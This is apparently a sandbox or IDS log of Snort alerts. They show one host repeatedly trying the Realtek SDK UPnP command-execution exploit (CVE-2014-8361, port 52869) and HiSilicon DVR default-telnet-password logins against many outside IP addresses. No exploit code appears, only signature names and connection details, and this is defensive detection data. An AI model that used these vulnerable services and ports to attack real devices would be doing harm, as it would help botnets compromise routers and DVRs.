    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39740 -> 45.158.23.111:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52782 -> 91.232.198.239:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52782 -> 91.232.198.239:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52784 -> 91.232.198.239:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60902 -> 45.195.156.236:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60902 -> 45.195.156.236:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52830 -> 45.127.160.227:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52830 -> 45.127.160.227:52869
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:37830 -> 186.37.123.179:23
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55886 -> 45.33.250.95:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55886 -> 45.33.250.95:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45084 -> 91.77.218.117:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45084 -> 91.77.218.117:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45092 -> 91.77.218.117:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50642 -> 45.13.245.91:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50642 -> 45.13.245.91:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34434 -> 45.115.241.235:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34434 -> 45.115.241.235:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39172 -> 185.221.85.168:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39172 -> 185.221.85.168:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39192 -> 185.221.85.168:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44898 -> 45.113.2.29:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44898 -> 45.113.2.29:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34486 -> 45.116.145.118:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34486 -> 45.116.145.118:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40814 -> 45.33.249.188:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40814 -> 45.33.249.188:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53554 -> 45.41.91.58:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53554 -> 45.41.91.58:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40820 -> 45.33.249.188:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51514 -> 45.33.245.119:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51514 -> 45.33.245.119:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47298 -> 45.43.235.13:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47298 -> 45.43.235.13:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47140 -> 45.4.218.172:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47140 -> 45.4.218.172:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55142 -> 45.42.86.168:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55142 -> 45.42.86.168:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47156 -> 45.4.218.172:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53478 -> 91.77.113.90:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53478 -> 91.77.113.90:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53484 -> 91.77.113.90:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50066 -> 45.33.241.251:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50066 -> 45.33.241.251:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59678 -> 45.43.227.251:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59678 -> 45.43.227.251:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41254 -> 45.33.247.42:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41254 -> 45.33.247.42:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60464 -> 45.207.218.24:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60464 -> 45.207.218.24:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42500 -> 45.42.86.235:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42500 -> 45.42.86.235:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46150 -> 45.254.24.208:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46150 -> 45.254.24.208:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60486 -> 45.207.218.24:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57426 -> 45.207.62.231:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57426 -> 45.207.62.231:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48426 -> 45.115.243.50:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48426 -> 45.115.243.50:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46160 -> 45.254.24.208:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38016 -> 45.207.62.49:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38016 -> 45.207.62.49:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38022 -> 45.207.62.49:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59660 -> 185.235.183.129:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59660 -> 185.235.183.129:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59662 -> 185.235.183.129:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58584 -> 185.235.183.101:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58584 -> 185.235.183.101:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58586 -> 185.235.183.101:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35278 -> 45.36.131.191:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35278 -> 45.36.131.191:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35284 -> 45.36.131.191:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45424 -> 45.41.83.30:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45424 -> 45.41.83.30:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46558 -> 185.235.182.71:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46558 -> 185.235.182.71:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46594 -> 185.235.182.71:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 97.64.252.73:23 -> 192.168.2.23:57628
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 97.64.252.73:23 -> 192.168.2.23:57628
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59464 -> 45.41.88.24:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59464 -> 45.41.88.24:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45740 -> 45.122.132.88:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45740 -> 45.122.132.88:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35668 -> 185.143.0.31:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35668 -> 185.143.0.31:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35672 -> 185.143.0.31:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37472 -> 185.207.92.74:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37472 -> 185.207.92.74:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37474 -> 185.207.92.74:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:52840
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47826 -> 45.33.245.203:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47826 -> 45.33.245.203:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37702 -> 91.78.174.65:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37702 -> 91.78.174.65:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37710 -> 91.78.174.65:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36146 -> 45.33.246.58:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36146 -> 45.33.246.58:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59310 -> 45.120.78.157:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59310 -> 45.120.78.157:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35812 -> 91.77.237.240:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35812 -> 91.77.237.240:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35036 -> 91.78.28.230:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35036 -> 91.78.28.230:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35820 -> 91.77.237.240:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42388 -> 91.134.128.29:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42388 -> 91.134.128.29:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42392 -> 91.134.128.29:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35044 -> 91.78.28.230:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49322 -> 45.122.136.216:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49322 -> 45.122.136.216:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57092 -> 91.78.19.247:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57092 -> 91.78.19.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57096 -> 91.78.19.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57106 -> 45.207.220.208:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57106 -> 45.207.220.208:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37882 -> 185.242.234.34:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37882 -> 185.242.234.34:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57114 -> 45.207.220.208:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41772 -> 185.131.188.62:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41772 -> 185.131.188.62:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57292 -> 91.79.48.45:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57292 -> 91.79.48.45:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41778 -> 185.131.188.62:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57300 -> 91.79.48.45:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39168 -> 45.43.231.30:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39168 -> 45.43.231.30:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:53078
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33068 -> 45.120.109.7:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33068 -> 45.120.109.7:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36724 -> 185.65.163.179:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36724 -> 185.65.163.179:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33078 -> 45.120.109.7:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36736 -> 185.65.163.179:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33350 -> 45.120.78.7:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33350 -> 45.120.78.7:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44726 -> 91.76.193.247:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44726 -> 91.76.193.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44732 -> 91.76.193.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44182 -> 45.122.133.223:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44182 -> 45.122.133.223:52869
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:46092 -> 138.186.179.250:23
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 68.65.150.5:23 -> 192.168.2.23:55464
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38482 -> 185.235.182.134:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38482 -> 185.235.182.134:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60454 -> 185.71.64.218:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60454 -> 185.71.64.218:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38488 -> 185.235.182.134:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60534 -> 185.71.64.218:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47204 -> 185.245.0.215:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47204 -> 185.245.0.215:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58394 -> 45.42.84.54:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58394 -> 45.42.84.54:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:53392
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36950 -> 45.138.70.52:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36950 -> 45.138.70.52:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55128 -> 45.126.228.168:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55128 -> 45.126.228.168:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60024 -> 45.133.119.65:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60024 -> 45.133.119.65:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47588 -> 45.42.93.89:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47588 -> 45.42.93.89:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55732 -> 185.81.200.98:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55732 -> 185.81.200.98:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34326 -> 45.113.160.171:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34326 -> 45.113.160.171:52869
